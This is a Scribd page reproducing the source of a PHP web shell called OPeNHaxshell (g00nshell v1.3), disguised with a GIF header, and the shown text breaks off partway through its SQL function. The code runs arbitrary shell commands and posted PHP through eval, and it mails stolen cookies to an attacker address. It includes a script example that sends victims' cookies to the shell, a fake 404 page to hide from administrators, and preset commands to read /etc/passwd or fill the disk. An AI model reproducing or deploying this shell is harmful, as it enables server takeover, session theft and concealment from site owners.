Scribd
Upload
53 views

Code Source Final OPeNHaxshell v1.3

This document appears to be documentation for an open source PHP web shell called OPeNHaxshell. It provides information on how to use the shell such as executing commands via URLs, stealing cookies, and different verification levels. It also lists known bugs, credits contributors, and warns administrators to delete the file if found without approval. The shell allows accessing files, viewing PHP info, executing PHP code, using SQL, sending emails, uploading files, and more through a graphical user interface.

Uploaded by

Rassoul SOW
Copyright
© © All Rights Reserved
Available Formats
Download as RTF, PDF, TXT or read online on Scribd
53 views

Code Source Final OPeNHaxshell v1.3

This document appears to be documentation for an open source PHP web shell called OPeNHaxshell. It provides information on how to use the shell such as executing commands via URLs, stealing cookies, and different verification levels. It also lists known bugs, credits contributors, and warns administrators to delete the file if found without approval. The shell allows accessing files, viewing PHP info, executing PHP code, using SQL, sending emails, uploading files, and more through a graphical user interface.

Uploaded by

Rassoul SOW
Copyright
© © All Rights Reserved
Available Formats
Download as RTF, PDF, TXT or read online on Scribd
You are on page 1/ 12

1 GIF89;a

2 666
3 <?php
4 /*
5
6 ###
7 ###
8 ###
9 ###
10 ###
11 ###
12 ###
13 ###
14 ###
15 ###
16 ###
17 ###
18 ###
19 ###
20 ###
21 ###
22 ###
23 ###
24 ###
25 ###
26 ###
27 ###
28 ###
29 ###
30 ###
31 ###
32 ###
33 ###
34 ###
35 ###
36 ###
37 ###
38 ###
39 ###
40 ###
41 # [OPeNHax]Tn presents: #
42 # OPeNHaxshell v1.3 final #
43
44 ###
45 ###
46 ###
47 ###
48 ###
49 ###
50 ###
51 ###
52 ###
53 ###
54 ###
55 ###
56 ###
57 ###DOCUMENTATION
58 ###
59 ###
60 ###
61 ###
62 ###
63 ###
64 ###
65 ###
66 ###
67 ###
68 ###
69 ###
70 ###
71 ####
72 #To execute commands, simply include ?cmd=___ in the url. #
73 #Ex: http://site.com/shl.php?cmd=whoami #
74 # #
75 #To steal cookies, use ?cookie=___ in the url. #
76 #Ex: <script>document.location.href= #
77 #'http://site.com/shl.php?cookie='+document.cookies</script> #
78
79 ###
80 ###
81 ###
82 ###
83 ###
84 ###
85 ###
86 ###
87 ###
88 ###
89 ###
90 ###
91 ###VERIFICATION LEVELS
92 ###
93 ###
94 ###
95 ###
96 ###
97 ###
98 ###
99 ###
100 ###
101 ###
102 ###
103 ####
104 #0: No protection; anyone can access #
105 #1: User-Agent required #
106 #2: Require IP #
107 #3: Basic Authentication #
108
109 ###
110 ###
111 ###
112 ###
113 ###
114 ###
115 ###
116 ###
117 ###
118 ###
119 ###
120 ###
121 ###
122 ###
123 ###KNOWN BUGS
124 ###
125 ###
126 ###
127 ###
128 ###
129 ###
130 ###
131 ###
132 ###
133 ###
134 ###
135 ###
136 ###
137 ###
138 ###
139 #Windows directory handling #
140 # #
141 #The SQL tool is NOT complete. There is currently no editing function#
142 #available. Some time in the future this may be fixed, but for now #
143 #don't complain to me about it #
144
145 ###
146 ###
147 ###
148 ###
149 ###
150 ###
151 ###
152 ###
153 ###
154 ###
155 ###
156 ###
157 ###
158 ###
159 ###
160 ###SHOUTS
161 ###
162 ###
163 ###
164 ###
165 ###
166 ###
167 ###
168 ###
169 ###
170 ###
171 ###
172 ###
173 ###
174 ###
175 ###
176 ###
177 #pr0be - Beta testing & CSS #
178 #TrinTiTTY - Beta testing #
179 #clorox - Beta testing #
180 #Everyone else at g00ns.net #
181
182 ###
183 ###
184 ###
185 ###
186 ###
187 ###
188 ###
189 ###
190 ###
191 ###
192 ###
193 ###NOTE TO ADMINISTRATORS
194 ###
195 ###
196 ###
197 ###
198 ###
199 ###
200 ###
201 ###
202 ###
203 ###
204 ###
205 ###
206 #If this script has been found on your server without your approval, #
207 #it would probably be wise to delete it and check your logs. #
208
209 ###
210 ###
211 ###
212 ###
213 ###
214 ###
215 ###
216 ###
217 ###
218 ###
219 ###
220 ###
221 ###
222 ###
223 ###
224 ###
225 ###
226 ###
227 ###
228 ###
229 ###
230 ###
231 ###
232 ###
233 ###
234 ###
235 ###
236 ###
237 ###
238 ###
239 ###
240 ###
241 ###
242 ###
243 ###
244 */
245 // Configuration
246 $auth = 0;
247 $uakey = "b5c3d0b28619de70bf5588505f4061f2"; // MD5 encoded user-agent
248 $IP = array("127.0.0.2","127.0.0.1"); // IP Addresses allowed to access shell
249 $email = ""; // E-mail address where cookies will be sent
250 $user = "af1035a85447f5aa9d21570d884b723a"; // MD5 encoded User
251 $pass = "47e331d2b8d07465515c50cb0fad1e5a"; // MD5 encoded Password
252 // Global Variables
253 $version = "1.3 final";
254 $self = $_SERVER['PHP_SELF'];
255 $soft = $_SERVER["SERVER_SOFTWARE"];
256 $servinf = split("[:]", getenv('HTTP_HOST'));
257 $servip = $servinf[0];
258 $servport = $servinf[1];
259 $uname = php_uname();
260 $curuser = @exec('whoami');
261 $cmd = $_GET['cmd'];
262 $act = $_GET['act'];
263 $cmd = $_GET['cmd'];
264 $cookie = $_GET['cookie'];
265 $f = $_GET['f'];
266 $curdir = cleandir(getcwd());
267 if(!$dir){$dir = $_GET['dir'];}
268 elseif($dir && $_SESSION['dir']){$dir = $_SESSION['dir'];}
269 elseif($dir && $_SESSION['dir']){$dir = $curdir;}
270 if($dir && $dir != "nullz"){$dir = cleandir($dir);}
271 $contents = $_POST['contents'];
272 $gf = $_POST['gf'];
273 $img = $_GET['img'];
274 session_start();
275 @set_time_limit(5);
276 switch($auth){ // Authentication switcher
277 case 0: break;
278 case 1: if(md5($_SERVER['HTTP_USER_AGENT']) != $uakey){hide();}
break;
279 case 2: if(!in_array($_SERVER['REMOTE_ADDR'],$IP)){hide();} break;
280 case 3: if(!$_SERVER["PHP_AUTH_USER"]){userauth();} break;
281 }
282
283 function userauth(){ // Basic authentication function
284 global $user, $pass;
285 header("WWW-Authenticate: Basic realm='Secure Area'");
286 if(md5($_SERVER["PHP_AUTH_USER"]) != $user ||
md5($_SERVER["PHP_AUTH_PW"] != $pass)){
287 hide();
288 die();
289 }
290 }
291 if(!$act && !$cmd && !$cookie && !$f && !$dir && !$gf && !$img){main();}
292 elseif(!$act && $cmd){
293 style();
294 echo("<b>Results:</b>\n<br><textarea rows=20 cols=100>");
295 $cmd = exec($cmd, $result);
296 foreach($result as $line){echo($line . "\n");}
297 echo("</textarea>");
298 }
299 elseif($cookie){@mail("$email", "Cookie Data", "$cookie", "From: $email");
hide();} // Cookie stealer function
300 elseif($act == "view" && $f && $dir){view($f, $dir);}
301 elseif($img){img($img);}
302 elseif($gf){grab($gf);}
303 elseif($dir){files($dir);}
304 else{
305 switch($act){
306 case "phpinfo": phpinfo();break;
307 case "sql": sql();break;
308 case "files": files($dir);break;
309 case "email": email();break;
310 case "cmd": cmd();break;
311 case "upload": upload();break;
312 case "tools": tools();break;
313 case "sqllogin": sqllogin();break;
314 case "sql": sql();break;
315 case "lookup": lookup();break;
316 case "kill": kill();break;
317 case "phpexec": execphp();break;
318 default: main();break;
319 }
320 }
321 function cleandir($d){ // Function to clean up the $dir and $curdir variables
322 $d = realpath($d);
323 $d = str_replace("\\\\", "//", $d);
324 $d = str_replace("////", "//", $d);
325 $d = str_replace("\\", "/", $d);
326 return($d);
327 }
328 function hide(){ // Hiding function
329 global $self, $soft, $servip, $servport;
330 die("<!DOCTYPE HTML PUBLIC '-//IETF//DTD HTML 2.0//EN'>
331 <HTML><HEAD>
332 <TITLE>404 Not Found</TITLE>
333 </HEAD><BODY>
334 <H1>Not Found</H1>
335 The requested URL $self was not found on this server.<P>
336 <P>Additionally, a 404 Not Found
337 error was encountered while trying to use an ErrorDocument to handle the
request.
338 <HR>
339 <ADDRESS>$soft Server at $servip Port $servport</ADDRESS>
340 </BODY></HTML>");
341 }
342 function style(){ // Style / header function
343 global $servip,$version;
344 echo("<html>\n
345 <head>\n
346 <title>g00nshell v" . $version . " - " . $servip . "</title>\n
347 <style>\n
348 body { background-color:#000000; color:white; font-family:Verdana; font-
size:11px; }\n
349 h1 { color:white; font-family:Verdana; font-size:11px; }\n
350 h3 { color:white; font-family:Verdana; font-size:11px; }\n
351 input,textarea,select { color:#FFFFFF; background-color:#2F2F2F; border:1px
solid #4F4F4F; font-family:Verdana; font-size:11px; }\n
352 textarea { font-family:Courier; font-size:11px; }\n
353 a { color:#6F6F6F; text-decoration:none; font-family:Verdana; font-
size:11px; }\n
354 a:hover { color:#7F7F7F; }\n
355 td,th { font-size:12px; vertical-align:middle; }\n
356 th { font-size:13px; }\n
357 table { empty-cells:show;}\n
358 .inf { color:#7F7F7F; }\n
359 </style>\n
360 </head>\n");
361 }
362 function main(){ // Main/menu function
363 global $self, $servip, $servport, $uname, $soft, $banner, $curuser, $version;
364 style();
365 $act = array('cmd'=>'Command Execute','files'=>'File View','phpinfo'=>'PHP
info', 'phpexec'=>'PHP Execute',
366 'tools'=>'Tools','sqllogin'=>'SQL','email'=>'Email','upload'=>'Get
Files','lookup'=>'List Domains','bshell'=>'Bindshell','kill'=>'Kill Shell');
367 $capt = array_flip($act);
368 echo("<form method='GET' name='shell'>");
369 echo("<b>Host:</b> <span class='inf'>" . $servip . "</span><br>");
370 echo("<b>Server software:</b> <span class='inf'>" . $soft . "</span><br>");
371 echo("<b>Uname:</b> <span class='inf'>" . $uname . "</span><br>");
372 echo("<b>Shell Directory:</b> <span class='inf'>" . getcwd() . "</span><br>");
373 echo("<div style='display:none' id='info'>");
374 echo("<b>Current User:</b> <span class='inf'>" . $curuser . "</span><br>");
375 echo("<b>ID:</b> <span class='inf'>" . @exec('id') . "</span><br>");
376 if(@ini_get('safe_mode') != ""){echo("<b>Safemode:</b> <font
color='red'>ON</font>");}
377 else{echo("<b>Safemode:</b> <font color='green'>OFF</font>");}
378 echo("\n<br>\n");
379 if(@ini_get('open_basedir') != ""){echo("<b>Open Base Dir:</b> <font
color='red'>ON</font> [ <span class='inf'>" . ini_get('open_basedir') . "</span> ]");}
380 else{echo("<b>Open Base Dir:</b> <font color='green'>OFF</font>");}
381 echo("\n<br>\n");
382 if(@ini_get('disable_functions') != ""){echo("<b>Disabled functions:</b> " .
@ini_get('disable_functions'));}
383 else{echo("<b>Disabled functions:</b> None");}
384 echo("\n<br>\n");
385 if(@function_exists(mysql_connect)){echo("<b>MySQL:</b> <font
color='green'>ON</font>");}
386 else{echo("<b>MySQL:</b> <font color='red'>OFF</font>");}
387 echo("</div>");
388 echo("[ <a href='#hax' onClick=\"document.getElementById('info').style.display
= 'block';\">More</a> ] ");
389 echo("[ <a href='#hax' onClick=\"document.getElementById('info').style.display
= 'none';\">Less</a> ]");
390 echo("<center>");
391 echo("<h3 align='center'>Links</h3>");
392 if($_SERVER['QUERY_STRING']){foreach($act as $link){echo("[ <a
href='?" . $_SERVER['QUERY_STRING'] . "&act=" . $capt[$link] . "'
target='frm'>" . $link . "</a> ] ");}}
393 else{foreach($act as $link){echo("[ <a href='?act=" . $capt[$link] . "'
target='frm'>" . $link . "</a> ] ");}}
394 echo("</center>");
395 echo("<hr>");
396 echo("<br><iframe name='frm' style='width:100%; height:65%; border:0;' src='?
act=files'></iframe>");
397 echo("<pre style='text-align:center'>:: g00nshell <font color='red'>v" . $version .
"</font> ::</pre>");
398 die();
399 }
400 function cmd(){ // Command execution function
401 style();
402 echo("<form name='CMD' method='POST'>");
403 echo("<b>Command:</b><br>");
404 echo("<input name='cmd' type='text' size='50'> ");
405 echo("<select name='precmd'>");
406 $precmd = array(''=>'','Read /etc/passwd'=>'cat /etc/passwd','Open
ports'=>'netstat -an',
407 'Running Processes'=>'ps -aux', 'Uname'=>'uname -a', 'Get UID'=>'id',
408 'Create Junkfile (/tmp/z)'=>'dd if=/dev/zero of=/tmp/z bs=1M
count=1024',
409 'Find passwd files'=>'find / -type f -name passwd');
410 $capt = array_flip($precmd);
411 foreach($precmd as $c){echo("<option value='" . $c . "'>" . $capt[$c] . "\n");}
412 echo("</select><br>\n");
413 echo("<input type='submit' value='Execute'>\n");
414 echo("</form>\n");
415 if($_POST['cmd'] != ""){$x = $_POST['cmd'];}
416 elseif($_POST['precmd'] != ""){$x = $_POST['precmd'];}
417 else{die();}
418 echo("Results: <br><textarea rows=20 cols=100>");
419 $cmd = @exec($x, $result);
420 foreach($result as $line){echo($line . "\n");}
421 echo("</textarea>");
422 }
423 function execphp(){ // PHP code execution function
424 style();
425 echo("<h4>Execute PHP Code</h4>");
426 echo("<form method='POST'>");
427 echo("<textarea name='phpexec' rows=5 cols=100>");
428 if(!$_POST['phpexec']){echo("/*Don't include <? ?> tags*/\n");}
429 echo(htmlentities($_POST['phpexec']) . "</textarea>\n<br>\n");
430 echo("<input type='submit' value='Execute'>");
431 echo("</form>");
432 if($_POST['phpexec']){
433 echo("<textarea rows=10 cols=100>");
434 eval(stripslashes($_POST['phpexec']));
435 echo("</textarea>");
436 }
437 }
438 function sqllogin(){ // MySQL login function
439 session_start();
440 if($_SESSION['isloggedin'] == "true"){
441 header("Location: ?act=sql");
442 }
443 style();
444 echo("<form method='post' action='?act=sql'>");
445 echo("User:<br><input type='text' name='un' size='30'><br>\n");
446 echo("Password:<br><input type='text' name='pw' size='30'><br>\n");
447 echo("Host:<br><input type='text' name='host' size='30'
value='localhost'><br>\n");
448 echo("Port:<br><input type='text' name='port' size='30' value='3306'><br>\n");
449 echo("<input type='submit' value='Login'>");
450 echo("</form>");
451 die();
452 }
453 function sql(){ // General SQL Function
454 session_start();
455 if(!$_GET['sqlf']){style();}
456 if($_POST['un'] && $_POST['pw']){;
457 $_SESSION['sql_user'] = $_POST['un'];
458 $_SESSION['sql_password'] = $_POST['pw'];
459 }
460 if($_POST['host']){$_SESSION['sql_host'] = $_POST['host'];}
461 else{$_SESSION['sql_host'] = 'localhost';}
462 if($_POST['port']){$_SESSION['sql_port'] = $_POST['port'];}
463 else{$_SESSION['sql_port'] = '3306';}
464 if($_SESSION['sql_user'] && $_SESSION['sql_password']){
465 if(!($sqlcon = @mysql_connect($_SESSION['sql_host'] . ':' .
$_SESSION['sql_port'], $_SESSION['sql_user'], $_SESSION['sql_password']))){
466 unset($_SESSION['sql_user'], $_SESSION['sql_password'],
$_SESSION['sql_host'], $_SESSION['sql_port']);
467 echo("Invalid credentials<br>\n");
468 die(sqllogin());
469 }
470 else{
471 $_SESSION['isloggedin'] = "true";
472 }
473 }
474 else{
475 die(sqllogin());
476 }
477 if ($_GET['db']){
478 mysql_select_db($_GET['db'], $sqlcon);
479 if($_GET['sqlquery']){
480 $dat = mysql_query($_GET['sqlquery'], $sqlcon) or die(mysql_error());
481 $num = mysql_num_rows($dat);
482 for($i=0;$i<$num;$i++){
483 echo(mysql_result($dat, $i) . "<br>\n");
484 }
485 }
486 else if($_GET['table'] && !$_GET['sqlf']){
487 echo("<a href='?act=sql&db=" . $_GET['db'] . "&table=" . $_GET['table'] .
"&sqlf=ins'>Insert Row</a><br><br>\n");
488 echo("<table border='1'>");
489 $query = "SHOW COLUMNS FROM " . $_GET['table'];
490 $result = mysql_query($query, $sqlcon) or die(mysql_error());
491 $i = 0;

You might also like